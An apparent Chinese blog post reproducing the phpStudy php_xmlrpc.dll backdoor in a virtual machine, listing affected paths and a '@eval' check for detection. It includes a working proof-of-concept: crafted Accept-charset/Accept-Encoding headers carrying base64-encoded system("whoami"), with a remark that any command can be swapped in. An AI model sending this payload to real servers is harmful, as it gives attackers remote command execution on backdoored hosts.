phpstudy后门利用复现

0x01.简介

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用。

0x02.漏洞描述

phpstudy近期被爆存在有人恶意植入后门,相关大佬已经被请去喝茶了。

后门存在路径:
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

安装过phpstudy的小伙伴可以查看一下自己的phpstudy是否存在后门。我这里虚拟机演示

phpstudy后门利用复现_第1张图片

选择php_xmlrpc.dll该文件用记事本打开。查找关键字@eval查看是否存在后门。我这个已经看到存在了。

0x03.漏洞利用

开启phpstudy,

phpstudy后门利用复现_第2张图片

虚拟机当前ip,物理机访问 

phpstudy后门利用复现_第3张图片

poc:

Accept-charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==
Accept-Encoding: gzip,deflate

ZWNobyBzeXN0ZW0oIndob2FtaSIpOw== 为echo system("whoami"); base64编码后内容

burp 抓包,修改请求包内容发送

phpstudy后门利用复现_第4张图片

成功复现 ,触发远程远程命令执行,命令可变,自己编码一下就行了

你可能感兴趣的:(phpstudy后门利用复现)